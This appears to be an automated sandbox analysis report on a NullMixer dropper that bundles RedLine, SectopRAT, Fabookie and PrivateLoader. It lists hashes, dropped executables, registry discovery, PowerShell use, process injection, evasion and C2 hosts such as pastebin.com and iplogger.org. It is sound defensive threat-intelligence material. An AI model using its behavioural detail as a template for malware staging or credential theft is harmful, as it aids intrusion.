SHA512 fd8dd7936d96952acaba5f96ff6116b17bc79f770b324945ba966b00e6b3ff6c9f6388bd402d3e5ad40d42a37123416fe904a7d15c749585593caecfcf46b816

memory/1760-222-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1760-225-0x0000000004F70000-0x000000000507A000-memory.dmp

memory/1760-227-0x0000000004EE0000-0x0000000004F2C000-memory.dmp

memory/1760-226-0x0000000004EA0000-0x0000000004EDC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat062000ca9aa6.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/1760-224-0x0000000004D00000-0x0000000004D12000-memory.dmp

memory/1760-223-0x0000000005300000-0x0000000005918000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\U56d.r

MD5 4d5164bd007e1af1a6b436b89fc98329
SHA1 808e5215729cff6daf37bfcac7af29e8959a7c26
SHA256 eaeb79cf3f2e99906d1b5f89b92fcb5555117f0a527247b5becbc78cf65cc434
SHA512 f977ced0b42db76bab7d79d35f6dad56bdbbde527ccde0f8810838d5364b89223f9ec673915ac9b0f595bad7251d3d17d1be479c8ed5bf56c19aac8470a6b668

C:\Users\Admin\AppData\Local\Temp\FdKD47Ef.i1

MD5 22e51c0e8d96e09cf8571ef2a4f91cfb
SHA1 46f3a3ad48c540816c110c67b8eab824ebeec8c1
SHA256 e296a4b63a6561115cab7809fb27eb85d3db864d59ecbce82b784d52572a83f1
SHA512 40e328acf47cbf6754b29b856e6a17e6cc15cf9b11b9e58b267fb26b14d598e71cefa266b43f552d51d81dca712e5024a77ca09fb1535ae54cb8586e8b5ccc7f

C:\Users\Admin\AppData\Local\Temp\ykifDQA.1

MD5 7b25b2318e896fa8f9a99f635c146c9b
SHA1 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2
SHA256 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89
SHA512 a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6

C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0

MD5 6c83f0423cd52d999b9ad47b78ba0c6a
SHA1 1f32cbf5fdaca123d32012cbc8cb4165e1474a04
SHA256 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae
SHA512 e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec

C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh

MD5 973c9cf42285ae79a7a0766a1e70def4
SHA1 4ab15952cbc69555102f42e290ae87d1d778c418
SHA256 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968
SHA512 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85

C:\Users\Admin\AppData\Local\Temp\20L2vNO.2

MD5 4bf3493517977a637789c23464a58e06
SHA1 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4
SHA256 ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831
SHA512 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501

memory/1500-228-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7ab31342d1577fbf35832794ed7ab952
SHA1 85c2d3f12c860791ee4aac97d54d8254f66b5c40
SHA256 1d38ec9d273d2c68ffd4557d20c4410cfaf1888842f865e26056f17acf459c86
SHA512 a8bdf994a2faff81d11fe8292fbb34300513ccc18f02ba5963b788f8ceb42eee0aca5902bb5d2babcea43f9e4d93cc97ff4725be4476a80be0f1f0caffdf6c56

memory/2420-232-0x0000000003740000-0x00000000037E5000-memory.dmp

memory/2420-236-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/2420-233-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/3380-237-0x0000000000400000-0x000000000054C000-memory.dmp

memory/2420-238-0x0000000000400000-0x0000000000602000-memory.dmp

memory/3380-239-0x0000000003140000-0x00000000031E5000-memory.dmp

memory/3380-243-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/3380-240-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/3144-244-0x0000000000400000-0x000000000054C000-memory.dmp

memory/3144-253-0x00000000036D0000-0x0000000003775000-memory.dmp

memory/3144-257-0x0000000003780000-0x0000000003812000-memory.dmp

memory/3144-254-0x0000000003780000-0x0000000003812000-memory.dmp

memory/2420-259-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/3380-267-0x00000000031F0000-0x0000000003282000-memory.dmp

memory/1476-270-0x00000000022A0000-0x00000000023EC000-memory.dmp

memory/1476-273-0x00000000022A0000-0x00000000023EC000-memory.dmp

memory/3144-275-0x0000000003780000-0x0000000003812000-memory.dmp

memory/1476-279-0x0000000002BD0000-0x0000000002C75000-memory.dmp

memory/1476-280-0x0000000002C80000-0x0000000002D12000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win10v2004-20241007-en

Max time kernel

77s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-9UUDL.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-DHV67.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed096e68af113.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed094d15aaa9a48.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 1752 wrote to memory of 2600 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1192 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1192 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3100 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3780 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 848 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2068 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2528 wrote to memory of 4356 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0937c2dc68a2496.exe
PID 2976 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
PID 2976 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a48dab921a3bda7.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 2068 wrote to memory of 964 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09a6fb1d0dd846.exe
PID 5112 wrote to memory of 1156 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
PID 5112 wrote to memory of 1156 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed0988d1c2bd9a37.exe
PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
PID 1256 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS8D654DF7\Wed09c36f786070b6.exe
